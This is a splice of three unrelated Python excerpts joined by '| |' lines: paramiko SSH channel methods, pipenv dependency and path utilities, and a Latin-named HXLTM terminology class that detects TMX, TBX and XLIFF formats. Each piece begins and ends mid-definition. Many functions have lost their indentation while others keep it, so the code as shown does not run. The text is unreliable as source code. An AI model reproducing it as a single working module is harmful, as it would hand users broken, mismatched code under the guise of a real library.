:param str name: new channel name
"""
self._name = name
def get_name(self):
"""
Get the name of this channel that was previously set by `set_name`.
"""
return self._name
def get_id(self):
"""
Return the `int` ID # for this channel.
The channel ID is unique across a `.Transport` and usually a small
number. It's also the number passed to
`.ServerInterface.check_channel_request` when determining whether to
accept a channel request in server mode.
"""
return self.chanid
    def set_combine_stderr(self, combine):
        """
        Set whether stderr should be combined into stdout on this channel.
        The default is ``False``, but in some cases it may be convenient to
        have both streams combined.

        If this is ``False``, and `exec_command` is called (or ``invoke_shell``
        with no pty), output to stderr will not show up through the `recv`
        and `recv_ready` calls. You will have to use `recv_stderr` and
        `recv_stderr_ready` to get stderr output.

        If this is ``True``, data will never show up via `recv_stderr` or
        `recv_stderr_ready`.

        :param bool combine:
            ``True`` if stderr output should be combined into stdout on this
            channel.
        :return: the previous setting (a `bool`).

        .. versionadded:: 1.1
        """
        data = bytes()
        # the flag and the stderr buffer must be swapped under the channel
        # lock so no incoming data is routed to the wrong buffer mid-change
        self.lock.acquire()
        try:
            old = self.combine_stderr
            self.combine_stderr = combine
            if combine and not old:
                # copy old stderr buffer into primary buffer
                data = self.in_stderr_buffer.empty()
        finally:
            self.lock.release()
        # feed the drained stderr data outside the lock (feeding may notify
        # readers)
        if len(data) > 0:
            self._feed(data)
        return old
### socket API
def settimeout(self, timeout):
"""
Set a timeout on blocking read/write operations. The ``timeout``
argument can be a nonnegative float expressing seconds, or ``None``. If
a float is given, subsequent channel read/write operations will raise
a timeout exception if the timeout period value has elapsed before the
operation has completed. Setting a timeout of ``None`` disables
timeouts on socket operations.
``chan.settimeout(0.0)`` is equivalent to ``chan.setblocking(0)``;
``chan.settimeout(None)`` is equivalent to ``chan.setblocking(1)``.
:param float timeout:
seconds to wait for a pending read/write operation before raising
``socket.timeout``, or ``None`` for no timeout.
"""
self.timeout = timeout
def gettimeout(self):
"""
Returns the timeout in seconds (as a float) associated with socket
operations, or ``None`` if no timeout is set. This reflects the last
call to `setblocking` or `settimeout`.
"""
return self.timeout
def setblocking(self, blocking):
"""
Set blocking or non-blocking mode of the channel: if ``blocking`` is 0,
the channel is set to non-blocking mode; otherwise it's set to blocking
mode. Initially all channels are in blocking mode.
In non-blocking mode, if a `recv` call doesn't find any data, or if a
`send` call can't immediately dispose of the data, an error exception
is raised. In blocking mode, the calls block until they can proceed. An
EOF condition is considered "immediate data" for `recv`, so if the
channel is closed in the read direction, it will never block.
``chan.setblocking(0)`` is equivalent to ``chan.settimeout(0)``;
``chan.setblocking(1)`` is equivalent to ``chan.settimeout(None)``.
:param int blocking:
0 to set non-blocking mode; non-0 to set blocking mode.
"""
if blocking:
self.settimeout(None)
else:
self.settimeout(0.0)
def getpeername(self):
"""
Return the address of the remote side of this Channel, if possible.
This simply wraps `.Transport.getpeername`, used to provide enough of a
socket-like interface to allow asyncore to work. (asyncore likes to
call ``'getpeername'``.)
"""
return self.transport.getpeername()
    def close(self):
        """
        Close the channel. All future read/write operations on the channel
        will fail. The remote end will receive no more data (after queued data
        is flushed). Channels are automatically closed when their `.Transport`
        is closed or when they are garbage collected.
        """
        self.lock.acquire()
        try:
            # only close the pipe when the user explicitly closes the channel.
            # otherwise they will get unpleasant surprises. (and do it before
            # checking self.closed, since the remote host may have already
            # closed the connection.)
            if self._pipe is not None:
                self._pipe.close()
                self._pipe = None

            if not self.active or self.closed:
                return
            msgs = self._close_internal()
        finally:
            self.lock.release()
        # send the close messages outside the lock: _send_user_message may
        # block, and holding the channel lock there could deadlock
        for m in msgs:
            if m is not None:
                self.transport._send_user_message(m)
def recv_ready(self):
"""
Returns true if data is buffered and ready to be read from this
channel. A ``False`` result does not mean that the channel has closed;
it means you may need to wait before more data arrives.
:return:
``True`` if a `recv` call on this channel would immediately return
at least one byte; ``False`` otherwise.
"""
return self.in_buffer.read_ready()
    def recv(self, nbytes):
        """
        Receive data from the channel. The return value is a string
        representing the data received. The maximum amount of data to be
        received at once is specified by ``nbytes``. If a string of length
        zero is returned, the channel stream has closed.

        :param int nbytes: maximum number of bytes to read.
        :return: received data, as a `str`
        :raises socket.timeout:
            if no data is ready before the timeout set by `settimeout`.
        """
        try:
            out = self.in_buffer.read(nbytes, self.timeout)
        except PipeTimeout:
            # translate the internal pipe timeout into the socket-style
            # exception callers expect
            raise socket.timeout()

        # consuming data frees receive-window space; ack > 0 means we owe the
        # peer a window adjustment so it may keep sending
        ack = self._check_add_window(len(out))
        # no need to hold the channel lock when sending this
        if ack > 0:
            m = Message()
            m.add_byte(cMSG_CHANNEL_WINDOW_ADJUST)
            m.add_int(self.remote_chanid)
            m.add_int(ack)
            self.transport._send_user_message(m)

        return out
def recv_stderr_ready(self):
"""
Returns true if data is buffered and ready to be read from this
channel's stderr stream. Only channels using `exec_command` or
`invoke_shell` without a pty will ever have data on the stderr
stream.
| |
in source["url"] or "pypi.org" in source["url"]
for source in sources
):
pkg_url = "https://pypi.org/pypi/{0}/json".format(name)
session = _get_requests_session()
try:
# Grab the hashes from the new warehouse API.
r = session.get(pkg_url, timeout=10)
api_releases = r.json()["releases"]
cleaned_releases = {}
for api_version, api_info in api_releases.items():
api_version = clean_pkg_version(api_version)
cleaned_releases[api_version] = api_info
for release in cleaned_releases[version]:
collected_hashes.append(release["digests"]["sha256"])
collected_hashes = ["sha256:" + s for s in collected_hashes]
except (ValueError, KeyError, ConnectionError):
if environments.is_verbose():
click_echo(
"{0}: Error generating hash for {1}".format(
crayons.red("Warning", bold=True), name
)
)
# # Collect un-collectable hashes (should work with devpi).
# try:
# collected_hashes = collected_hashes + list(
# list(resolver.resolve_hashes([result]).items())[0][1]
# )
# except (ValueError, KeyError, ConnectionError, IndexError):
# if verbose:
# print('Error generating hash for {}'.format(name))
req.hashes = sorted(set(collected_hashes))
name, _entry = req.pipfile_entry
entry = {}
if isinstance(_entry, six.string_types):
entry["version"] = _entry.lstrip("=")
else:
entry.update(_entry)
entry["version"] = version
entry["name"] = name
# if index:
# d.update({"index": index})
if markers_lookup.get(result.name):
entry.update({"markers": markers_lookup.get(result.name)})
entry = translate_markers(entry)
results.append(entry)
req_dir.cleanup()
return results
def multi_split(s, split):
    """Splits on multiple given separators, discarding empty pieces."""
    # normalize every separator to a single sentinel, then split once
    for sep in split:
        s = s.replace(sep, "|")
    return [piece for piece in s.split("|") if piece]
def is_star(val):
    """Return True when *val* is the literal wildcard string ``"*"``."""
    if not isinstance(val, six.string_types):
        return False
    return val == "*"
def is_pinned(val):
    """Return True when *val* (or its ``"version"`` entry, for dict-style
    Pipfile entries) pins an exact version with ``==``."""
    version = val.get("version") if isinstance(val, Mapping) else val
    return isinstance(version, six.string_types) and version.startswith("==")
def convert_deps_to_pip(deps, project=None, r=True, include_index=True):
    """Converts a Pipfile-formatted dependency to a pip-formatted one.

    (Fixed: the docstring previously opened with four quotes, leaving a stray
    leading ``"`` in the rendered text.)

    :param deps: mapping of package name -> Pipfile entry.
    :param project: optional project whose ``sources`` supply index URLs.
    :param r: when True (default), write the converted lines to a temporary
        requirements file and return its path; when False, return the list
        of pip requirement strings directly.
    :param include_index: include index/source URLs in the emitted lines.
    """
    from ._compat import NamedTemporaryFile
    from .vendor.requirementslib.models.requirements import Requirement

    dependencies = []
    for dep_name, dep in deps.items():
        # pass the project's configured sources through so index URLs resolve
        indexes = project.sources if hasattr(project, "sources") else []
        new_dep = Requirement.from_pipfile(dep_name, dep)
        if new_dep.index:
            # a per-dependency index forces index emission for this entry
            include_index = True
        req = new_dep.as_line(sources=indexes if include_index else None).strip()
        dependencies.append(req)
    if not r:
        return dependencies

    # Write requirements.txt to tmp directory.
    f = NamedTemporaryFile(suffix="-requirements.txt", delete=False)
    f.write("\n".join(dependencies).encode("utf-8"))
    f.close()
    return f.name
def mkdir_p(newdir):
    """works the way a good mkdir should :)

        - already exists, silently complete
        - regular file in the way, raise an exception
        - parent directory(ies) does not exist, make them as well

    From: http://code.activestate.com/recipes/82465-a-friendly-mkdir/
    """
    if os.path.isdir(newdir):
        # nothing to do
        return
    if os.path.isfile(newdir):
        raise OSError(
            "a file with the same name as the desired dir, '{0}', already exists.".format(
                newdir
            )
        )
    # create missing ancestors first, then the directory itself
    head, tail = os.path.split(newdir)
    if head and not os.path.isdir(head):
        mkdir_p(head)
    if tail:
        os.mkdir(newdir)
def is_required_version(version, specified_version):
    """Check to see if there's a hard requirement for version
    number provided in the Pipfile.
    """
    # Certain packages may be defined with multiple values.
    if isinstance(specified_version, dict):
        specified_version = specified_version.get("version", "")
    if not specified_version.startswith("=="):
        # anything other than an exact '==' pin is treated as satisfied
        return True
    return version.strip() == specified_version.split("==")[1].strip()
def strip_ssh_from_git_uri(uri):
    """Return git+ssh:// formatted URI to git+git@ format"""
    if not isinstance(uri, six.string_types):
        # non-strings pass through untouched
        return uri
    return uri.replace("git+ssh://", "git+")
def clean_git_uri(uri):
    """Cleans VCS uris from pip format"""
    # Add scheme for parsing purposes, this is also what pip does
    if isinstance(uri, six.string_types):
        if uri.startswith("git+") and "://" not in uri:
            uri = uri.replace("git+", "git+ssh://")
    return uri
def is_editable(pipfile_entry):
    """Return truthy when a mapping entry is flagged editable AND points at a
    local file/path or VCS source; plain string specifiers are never editable."""
    if not hasattr(pipfile_entry, "get"):
        return False
    # Short-circuit: the key tuple (which needs VCS_LIST) is only built when
    # the editable flag is actually set.
    return pipfile_entry.get("editable", False) and any(
        pipfile_entry.get(key) for key in ("file", "path") + VCS_LIST
    )
def is_installable_file(path):
    """Determine if a path can potentially be installed

    Accepts either a string path/URL or a pipfile-style mapping carrying a
    "file"/"path" key. Returns True only when the target exists on disk and
    is an installable directory or an archive file.
    """
    from .patched.notpip._internal.utils.misc import is_installable_dir
    from .patched.notpip._internal.utils.packaging import specifiers
    from .patched.notpip._internal.download import is_archive_file
    from ._compat import Path
    # Mapping form: unwrap the actual filesystem path ("file" entries are
    # URLs, so only their path component is kept).
    if hasattr(path, "keys") and any(
        key for key in path.keys() if key in ["file", "path"]
    ):
        path = urlparse(path["file"]).path if "file" in path else path["path"]
    if not isinstance(path, six.string_types) or path == "*":
        return False
    # If the string starts with a valid specifier operator, test if it is a valid
    # specifier set before making a path object (to avoid breaking windows)
    if any(path.startswith(spec) for spec in "!=<>~"):
        try:
            specifiers.SpecifierSet(path)
        # If this is not a valid specifier, just move on and try it as a path
        except specifiers.InvalidSpecifier:
            pass
        else:
            # Parsed cleanly as a version specifier, so it cannot be a file.
            return False
    if not os.path.exists(os.path.abspath(path)):
        return False
    lookup_path = Path(path)
    absolute_path = "{0}".format(lookup_path.absolute())
    if lookup_path.is_dir() and is_installable_dir(absolute_path):
        return True
    elif lookup_path.is_file() and is_archive_file(absolute_path):
        return True
    return False
def is_file(package):
    """Determine if a package name is for a File dependency."""
    if hasattr(package, "keys"):
        # Mapping form: a file dependency declares "file" or "path".
        return any(key in ["file", "path"] for key in package.keys())
    text = str(package)
    if os.path.exists(text):
        return True
    # Otherwise a file dependency must carry an explicit URL scheme.
    return any(text.startswith(scheme) for scheme in SCHEME_LIST)
def pep440_version(version):
    """Normalize version to PEP 440 standards"""
    from .patched.notpip._internal.index import parse_version

    # pip's own parser canonicalizes the version string for us.
    parsed = parse_version(version)
    return str(parsed)
def pep423_name(name):
    """Normalize package name to PEP 423 style standard."""
    name = name.lower()
    # NOTE(review): `any(i not in name ...)` is True unless the name contains
    # EVERY marker in VCS_LIST + SCHEME_LIST, so this branch is effectively
    # always taken and underscores are always replaced. The intent was likely
    # `all(i not in name ...)` (skip normalizing VCS/scheme URLs) — confirm
    # before changing, since callers may rely on the current behavior.
    if any(i not in name for i in (VCS_LIST + SCHEME_LIST)):
        return name.replace("_", "-")
    else:
        return name
def proper_case(package_name):
    """Properly case project name from pypi.org.

    Raises IOError when the package cannot be found (callers catch this and
    keep the original name).
    """
    # Hit the simple API.
    r = _get_requests_session().get(
        "https://pypi.org/pypi/{0}/json".format(package_name), timeout=0.3, stream=True
    )
    if not r.ok:
        raise IOError(
            "Unable to find package {0} in PyPI repository.".format(package_name)
        )
    # PyPI redirects to the canonically-cased URL; recover the proper name
    # from the final URL instead of parsing the JSON body.
    r = parse.parse("https://pypi.org/pypi/{name}/json", r.url)
    good_name = r["name"]
    return good_name
def split_section(input_file, section_suffix, test_function):
    """Split entries matching *test_function* into suffixed sub-sections.

    Works on either a pipfile (``packages``/``dev-packages``) or a lockfile
    (``default``/``develop``). For every recognized section, entries whose
    value satisfies ``test_function`` are moved into a new
    ``"<section>-<section_suffix>"`` section of the same mapping.

    :param dict input_file: pipfile- or lockfile-shaped mapping (mutated in place)
    :param str section_suffix: suffix naming the new split-out sections
    :param func test_function: predicate applied to each entry's value
    :return: the same mapping, with matching entries relocated
    """
    pipfile_sections = ("packages", "dev-packages")
    lockfile_sections = ("default", "develop")
    if any(name in input_file for name in pipfile_sections):
        known_sections = pipfile_sections
    elif any(name in input_file for name in lockfile_sections):
        known_sections = lockfile_sections
    else:
        # Neither pipfile nor lockfile sections present: nothing to split.
        return input_file
    for name in known_sections:
        entries = input_file.get(name, {})
        moved = {
            key: entries.pop(key)
            for key in list(entries)
            if test_function(entries.get(key))
        }
        input_file["-".join([name, section_suffix])] = moved
    return input_file
def split_file(file_dict):
    """Split VCS and editable dependencies out from file."""
    from .vendor.requirementslib.utils import is_vcs

    # Apply the VCS split first, then the editable split (matching the
    # original insertion order of the predicate mapping).
    predicates = (
        ("vcs", is_vcs),
        ("editable", lambda entry: hasattr(entry, "keys") and entry.get("editable")),
    )
    for suffix, predicate in predicates:
        file_dict = split_section(file_dict, suffix, predicate)
    return file_dict
def merge_deps(
    file_dict,
    project,
    dev=False,
    requirements=False,
    ignore_hashes=False,
    blocking=False,
    only=False,
):
    """
    Given a file_dict, merges dependencies and converts them to pip dependency lists.
    :param dict file_dict: The result of calling :func:`pipenv.utils.split_file`
    :param :class:`pipenv.project.Project` project: Pipenv project
    :param bool dev=False: Flag indicating whether dev dependencies are to be installed
    :param bool requirements=False: Flag indicating whether to use a requirements file
    :param bool ignore_hashes=False: Strip "hash" entries before converting
    :param bool blocking=False: Mark converted deps as blocking installs
    :param bool only=False: Currently unused; kept for interface compatibility
    :return: Pip-converted 3-tuples of [deps, requirements_deps]
    """
    deps = []
    requirements_deps = []
    for section in list(file_dict.keys()):
        # Turn develop-vcs into ['develop', 'vcs']; 'dev-packages' is a literal
        # section name, not a suffixed one, so it must not be split.
        section_name, suffix = (
            section.rsplit("-", 1)
            if "-" in section and not section == "dev-packages"
            else (section, None)
        )
        if not file_dict[section] or section_name not in (
            "dev-packages",
            "packages",
            "default",
            "develop",
        ):
            continue
        is_dev = section_name in ("dev-packages", "develop")
        if is_dev and not dev:
            continue
        if ignore_hashes:
            # BUG FIX: iterating a dict yields keys only, so unpacking each
            # key into (k, v) raised ValueError; iterate items() instead.
            for k, v in file_dict[section].items():
                if "hash" in v:
                    del v["hash"]
        # Block and ignore hashes for all suffixed sections (vcs/editable)
        no_hashes = True if suffix else ignore_hashes
        block = True if suffix else blocking
        include_index = True if not suffix else False
        converted = convert_deps_to_pip(
            file_dict[section], project, r=False, include_index=include_index
        )
        deps.extend((d, no_hashes, block) for d in converted)
        if dev and is_dev and requirements:
            requirements_deps.extend((d, no_hashes, block) for d in converted)
    return deps, requirements_deps
def recase_file(file_dict):
    """Recase file before writing to output.

    Re-queries PyPI (via proper_case) for the canonical capitalization of
    each package key in the pipfile/lockfile sections, keeping the original
    key whenever the lookup fails.
    """
    if "packages" in file_dict or "dev-packages" in file_dict:
        sections = ("packages", "dev-packages")
    elif "default" in file_dict or "develop" in file_dict:
        sections = ("default", "develop")
    else:
        # BUG FIX: 'sections' was left unbound here, so a dict with no known
        # sections raised UnboundLocalError instead of passing through.
        sections = ()
    for section in sections:
        file_section = file_dict.get(section, {})
        # Try to properly case each key if we can.
        for key in list(file_section.keys()):
            try:
                cased_key = proper_case(key)
            except IOError:
                cased_key = key
            file_section[cased_key] = file_section.pop(key)
    return file_dict
def get_windows_path(*args):
    """Sanitize a path for windows environments

    Accepts an arbitrary list of arguments and makes a clean windows path"""
    joined = os.path.join(*args)
    return os.path.normpath(joined)
def find_windows_executable(bin_path, exe_name):
    """Given an executable name, search the given location for an executable

    Tries the bare name first, then each extension from %PATHEXT% (e.g. .EXE,
    .BAT), and finally falls back to a PATH-wide search via find_executable.
    """
    requested_path = get_windows_path(bin_path, exe_name)
    if os.path.isfile(requested_path):
        return requested_path
    try:
        pathext = os.environ["PATHEXT"]
    except KeyError:
        # Not on Windows (or PATHEXT unset): skip extension probing.
        pass
    else:
        for ext in pathext.split(os.pathsep):
            path = get_windows_path(bin_path, exe_name + ext.strip().lower())
            if os.path.isfile(path):
                return path
    # May return None when the executable is not found anywhere on PATH.
    return find_executable(exe_name)
def path_to_url(path):
    """Convert a local filesystem path to a ``file://`` URI."""
    from ._compat import Path

    absolute = normalize_drive(os.path.abspath(path))
    return Path(absolute).as_uri()
def | |
default ([Any], optional): Value if not found. Defaults to None.
fontem (dict): An nested object to search
Returns:
[Any]: Return the result. Defaults to default
"""
if fontem is None:
fontem = self.crudum
keys = dotted_key.split('.')
return reduce(
lambda d, key: d.get(
key) if d else default, keys, fontem
)
def quod_aliud(self, aliud_typum: str, aliud_valorem: str) -> Dict:
"""Quod Aliud?
Requīsītum:
- *.hxmtm.yml:ontologia_aliud
- *.hxmtm.yml:ontologia_aliud_familiam
Args:
aliud_typum (str):
aliud valōrem
aliud_valōrem (str):
aliud valōrem
Returns:
Dict: Python Dict, de *.hxltm.yml
Exemplōrum gratiā (et Python doctest, id est, testum automata):
>>> ontologia = HXLTMTestumAuxilium.ontologia()
>>> 'UTX_adverb' in ontologia.\
quod_aliud('partem_orationis', 'lat_adverbium')['aliud']
True
>>> ontologia.\
quod_aliud('partem_orationis', 'lat_adverbium')['codicem_TBX']
'adverb'
"""
if aliud_typum not in self.crudum['ontologia_aliud'] or \
aliud_valorem not in \
self.crudum['ontologia_aliud'][aliud_typum]:
return None
resultatum = self.crudum['ontologia_aliud'][aliud_typum][aliud_valorem]
if '_aliud' in resultatum and resultatum['_aliud']:
resultatum['aliud'] = \
list(map(str.strip, resultatum['_aliud'].split('|')))
else:
# _[eng-Latn]Alias without aliases to other types?[eng-Latn]_
resultatum['aliud'] = []
aliud_familiam = self.crudum['ontologia_aliud_familiam'].keys()
# print('aliud_familiam', aliud_familiam)
for familiam in aliud_familiam:
if aliud_valorem.startswith(familiam + '_'):
resultatum['_aliud_familiam'] = familiam
for aliud in resultatum['aliud']:
# _[eng-Latn]
# Only create a codicem_TTTT if *.hxmtl.yml already not have
# one.
# [eng-Latn]_
if aliud.startswith(familiam + '_') and \
not 'codicem_' + familiam in resultatum:
resultatum['codicem_' + familiam] = \
aliud.replace(familiam + '_', '')
# print(' > quod_aliud resultatum', resultatum)
return resultatum
    def quod_aliud_de_multiplum(
            self,
            aliud_typum: str,
            aliud_valorem_multiplum: Union[List[str], str]
    ) -> Dict:
        """Quod Aliud de multiplum optiōnem?
        _[eng-Latn]
        HXLTM (when not working with RAW JSON) allows make simpler short
        aliases from multiple standards, like:
            'UTX_properNoun | TBX_noun'
        In such way that it actually allows to make inferences about other
        types implicitly even when some things are obvious
        (like a 'proper noun' must be a 'noun').
        When a field alredy not explicitly define an exact value, we
        'try smart inferences', but if the initial input do already have
        something wrong (but more specific for an output format) this
        method will not override the more explicity alias.
        Advanced checks (like bad tagging) should be done in another step.
        [eng-Latn]_
        Requīsītum:
        - *.hxmtm.yml:ontologia_aliud
        - *.hxmtm.yml:ontologia_aliud_familiam
        Args:
            aliud_typum (str):
                aliud valōrem
            aliud_valorem_multiplum (Union(List[str], str)):
                aliud valōrem
        Returns:
            Dict: Python Dict, de *.hxltm.yml
        Exemplōrum gratiā (et Python doctest, id est, testum automata):
        >>> ontologia = HXLTMTestumAuxilium.ontologia()
        >>> testum_I = ontologia.quod_aliud_de_multiplum(
        ...    'rem_statum',
        ...    ['lat_rem_finale', 'UTX_provisional', 'XLIFF_initial'])
        >>> testum_I
        {'_conjecturum': ['TBX_preferred'], '_crudum_originale': \
['lat_rem_finale', 'UTX_provisional', 'XLIFF_initial'], \
'codicem_TBX': 'preferred', \
'codicem_UTX': 'provisional', \
'codicem_XLIFF': 'initial', \
'codicem_lat': 'rem_finale'}
        >>> testum_II = ontologia.quod_aliud_de_multiplum(
        ...    'rem_statum',
        ...    ['lat_rem_finale'])
        >>> testum_II
        {'_conjecturum': ['TBX_preferred', 'UTX_approved', 'XLIFF_final'], \
'_crudum_originale': ['lat_rem_finale'], \
'codicem_TBX': 'preferred', \
'codicem_UTX': 'approved', \
'codicem_XLIFF': 'final', \
'codicem_lat': 'rem_finale'}
        """
        # Nothing to resolve for an empty or missing alias list.
        if not aliud_valorem_multiplum or len(aliud_valorem_multiplum) == 0:
            return None
        if isinstance(aliud_valorem_multiplum, str):
            aliud_valorem_multiplum = list(map(
                str.strip,
                aliud_valorem_multiplum.split('|')))
        # aliud_valorem_multiplum.sort(key=str.lower)
        resultatum = {
            '_crudum_originale': aliud_valorem_multiplum,
            '_conjecturum': []
        }
        # Families not yet resolved; entries are discarded as explicit
        # per-family codes are found below.
        aliud_familiam = set(
            sorted(self.crudum['ontologia_aliud_familiam'].keys(),
                   key=str.lower)
        )
        aliud_secundum = set()
        # First pass: record the codes the user stated explicitly, and collect
        # each entry's secondary aliases for the inference pass.
        for item in aliud_valorem_multiplum:
            rem = self.quod_aliud(aliud_typum, item)
            if rem is None or '_aliud_familiam' not in rem:
                # print('not in rem')
                continue
            resultatum['codicem_' + rem['_aliud_familiam']] = \
                rem['codicem_' + rem['_aliud_familiam']]
            aliud_familiam.discard(rem['_aliud_familiam'])
            if 'aliud' in rem and len(rem['aliud']) > 0:
                aliud_secundum.update(rem['aliud'])
            # print(rem['_aliud_familiam'])
            # aliud.append(rem)
        # Second pass: infer codes for families the user did not mention,
        # never overriding anything set explicitly above.
        if len(aliud_secundum) > 0:
            # print('>0', aliud_secundum)
            for item in aliud_secundum:
                rem = self.quod_aliud(aliud_typum, item)
                if rem is None or '_aliud_familiam' not in rem:
                    continue
                if 'codicem_' + rem['_aliud_familiam'] in resultatum:
                    # print('iam exsistit: ', item)
                    continue
                # print('conjectūrum!: ', item)
                resultatum['_conjecturum'].append(item)
                resultatum['codicem_' + rem['_aliud_familiam']] = \
                    rem['codicem_' + rem['_aliud_familiam']]
        resultatum['_conjecturum'].sort(key=str.lower)
        # Sort keys for stable, doctest-friendly output.
        resultatum = dict(OrderedDict(sorted(resultatum.items())))
        # print('')
        # print('resultatum', resultatum)
        # print('')
        return resultatum
def quod_formatum_excerptum(self) -> Dict:
"""Quod fōrmātum excerptum?
_[eng-Latn]
Return fōrmātum excerptum (the formatum_excerptum from Ontologia)
[eng-Latn]_
Trivia:
- fōrmātum, https://en.wiktionary.org/wiki/formatus#Latin
- excerptum, https://en.wiktionary.org/wiki/excerptus#Latin
Returns:
Dict: fōrmātum excerptum
"""
if self.crudum and 'formatum_excerptum' in self.crudum:
return self.crudum['formatum_excerptum']
return {}
def quod_globum_valorem(self) -> Dict:
"""Quod globum valorem?
_[eng-Latn]
Return global variables (for Ontologia)
[eng-Latn]_
Trivia:
- globum, https://en.wiktionary.org/wiki/globus#Latin
- valōrem, https://en.wiktionary.org/wiki/valor#Latin
Returns:
Dict: globum valorem
"""
# TODO: HXLTMOntologia.quod_globum_valorem is a draft.
# resultatum = {}
# return resultatum
return self.crudum
def quod_rem_statum(self,
statum_rem_accuratum: int = None,
statum_rem_textum: str = '',
rem_json: Union[str, Dict] = None
) -> Dict:
"""[summary]
Args:
statum_rem_accuratum (int, optional):
Statum rem accūrātum. Defallo Python None.
statum_rem_textum (str, optional):
Statum rem textum. Defallo vacuum textum.
Returns:
Dict: [description]
"""
# TODO: make the defaults configurable
resultatum = {
# 1-10, TBX uses it
'accuratum': statum_rem_accuratum,
# 'crudum': [],
'crudum_originale': [],
# initial, translated, reviewed, final
'XLIFF': 'initial',
# provisional, approved, '', non-standard, rejected, obsolete
'UTX': 'provisional'
}
if rem_json:
raise NotImplementedError('quod_rem_statum rem_json')
if statum_rem_textum != '':
crudum_originale = statum_rem_textum.split('|')
resultatum['crudum_originale'] = crudum_originale
# scālam, https://en.wiktionary.org/wiki/scala#Latin
# TODO: implement this check
return resultatum
    def quod_xml_typum(self,
                       radicem_tag: str,
                       radicem_attributum: dict = None
                       ) -> Dict:
        """quod_xml_typum Quod XML typum est?

        Detect the XML dialect (TMX / TBX / XLIFF variants) from a document's
        root tag and attributes.

        _[eng-Latn]
        TODO: make this method actually load the references from the
              *.hxltm.yml, so the users could have at least some freedom
              (as they already have when exporting) but now to import.
        [eng-Latn]_
        Args:
            radicem_tag (str):
                XML rādīcem (textum); may be namespace-qualified.
            radicem_attributum (dict, optional):
                HXL attribūtum de rādīcem. Defallo Python None
        Returns:
            Dict: typum, versiōnem, variāns
        """
        resultatum = {
            'hxltm_normam': '',
            'typum': 'XML',
            # XLIFF 2.x may provide srcLang / trgLang on <xliff>
            'linguam_fontem': '',
            'linguam_fontem_attributum': '',
            'linguam_objectivum': '',
            'linguam_objectivum_attributum': '',
            'radicem_attributum_crudum': {},
            # variāns, https://en.wiktionary.org/wiki/varians#Latin
            'varians': '',
            'versionem': -1
        }
        # def hxl_attr(clavem):
        #     if not clavem or clavem.find('}') == -1:
        #         return clavem
        #     return clavem.split('}')[-1]
        # NOTE(review): attributum aliases radicem_attributum, so the
        # short-key copies added below are written back into the caller's
        # dict too — confirm this side effect is intended.
        attributum = radicem_attributum if radicem_attributum else {}
        if radicem_attributum:
            # Mirror namespace-qualified keys ("{ns}version") under their
            # short names ("version") so the lookups below work either way.
            for clavem in list(radicem_attributum):
                clavem_basim = HXLTMUtil.xml_clavem_breve(clavem)
                if clavem_basim != clavem and \
                        clavem_basim not in radicem_attributum:
                    attributum[clavem_basim] = radicem_attributum[clavem]
            resultatum['radicem_attributum_crudum'] = \
                radicem_attributum
        radicem_tag_basim = HXLTMUtil.xml_clavem_breve(radicem_tag)
        # print('attributum', attributum)
        # print('quod_xml_typum', radicem_tag, radicem_attributum,
        #       resultatum, radicem_tag_basim)
        if radicem_tag_basim == 'tmx':
            resultatum['hxltm_normam'] = 'TMX'
            resultatum['typum'] = 'TMX'
            resultatum['versionem'] = '1.4'
        if radicem_tag_basim == 'martif':
            resultatum['hxltm_normam'] = 'TBX-Basim'
            resultatum['typum'] = 'TBX'
            resultatum['versionem'] = 'TBX-Basic'
        if radicem_tag_basim == 'tbx':
            resultatum['hxltm_normam'] = 'TBX-IATE'
            resultatum['typum'] = 'TBX'
            resultatum['versionem'] = 'TBX-IATE'
        if radicem_tag_basim == 'xliff':
            resultatum['hxltm_normam'] = 'XLIFF'
            resultatum['typum'] = 'XLIFF'
            resultatum['linguam_fontem_attributum'] = 'srcLang'
            resultatum['linguam_objectivum_attributum'] = 'trgLang'
            if 'version' in attributum:
                resultatum['versionem'] = attributum['version']
                # XLIFF 1.x uses per-element xml:lang instead of root
                # srcLang/trgLang attributes.
                if str(resultatum['versionem']).startswith('1.'):
                    resultatum['hxltm_normam'] = 'XLIFF-obsoletum'
                    resultatum['linguam_fontem_attributum'] = 'lang'
                    resultatum['linguam_objectivum_attributum'] = 'lang'
        if 'version' in attributum:
            resultatum['versionem'] = attributum['version']
        if 'type' in attributum:
            resultatum['varians'] = attributum['type']
        if 'srcLang' in attributum:
            resultatum['linguam_fontem'] = attributum['srcLang']
        if 'trgLang' in attributum:
            resultatum['linguam_objectivum'] = attributum['trgLang']
        return resultatum
def quod_xml_typum_tag(
self,
hxltm_normam: str
) -> Dict:
"""quod_xml_typum Quod XML typum est?
_[eng-Latn]
TODO: make this method actually load the references from the
*.hxltm.yml, so the users could have at least some freedom
(as they already have when exporting) but now to import.
[eng-Latn]_
Args:
hxltm_normam (str):
HXLTM normam (textum)
Returns:
Dict: typum, versiōnem, variāns
"""
resultatum = {
'conceptum_signum': '',
'conceptum_attributum': 'id',
'fontem': '',
'terminum': '',
'objectivum': ''
}
if hxltm_normam == 'TBX-Basim':
# <termEntry id="L10N_ego_codicem">
# <langSet xml:lang="la">
# <tig>
# <term>lat-Latn</term>
# </tig>
# </langSet>
# </termEntry>
resultatum['conceptum_signum'] = 'termEntry'
resultatum['terminum'] = 'langSet/tig/term'
if hxltm_normam == 'TBX-IATE':
# <conceptEntry id="254003">
# <descrip type="subjectField">linguistics</descrip>
# <langSec xml:lang="es">
# <termSec>
# <term>acto de habla indirecto</term>
# <termNote type="termType">fullForm</termNote>
# <descrip type="reliabilityCode">1</descrip>
# </termSec>
# </langSec>
# </conceptEntry>
resultatum['conceptum_signum'] = 'conceptEntry'
resultatum['terminum'] = 'langSec/termSec/term'
if hxltm_normam == 'TMX':
# <tu tuid="L10N_ego_codicem">
# <tuv xml:lang="la">
# <seg>lat-Latn</seg>
# </tuv>
# </tu>
resultatum['conceptum_signum'] = 'tu'
resultatum['conceptum_attributum'] = 'tuid' # Non 'id'
resultatum['terminum'] = 'tuv/seg'
if hxltm_normam == 'XLIFF':
# <xliff version="2.0"
# xmlns="urn:oasis:names:tc:xliff:document:2.0"
# xmlns:fs="urn:oasis:names:tc:xliff:fs:2.0"
# xmlns:val="urn:oasis:names:tc:xliff:validation:2.0"
# srcLang="pt"
# trgLang="es">
#
# (...)
#
# <unit id="L10N_ego_scriptum_nomen">
# <segment state="final">
# <source>Alfabeto latino</source>
# <target>Alfabeto latino</target>
# </segment>
# </unit>
resultatum['conceptum_signum'] = 'unit'
# resultatum['fontem'] = 'segment/source'
resultatum['fontem'] = 'source'
# resultatum['objectivum'] = 'segment/target'
resultatum['objectivum'] = 'target'
if hxltm_normam == 'XLIFF-obsoletum':
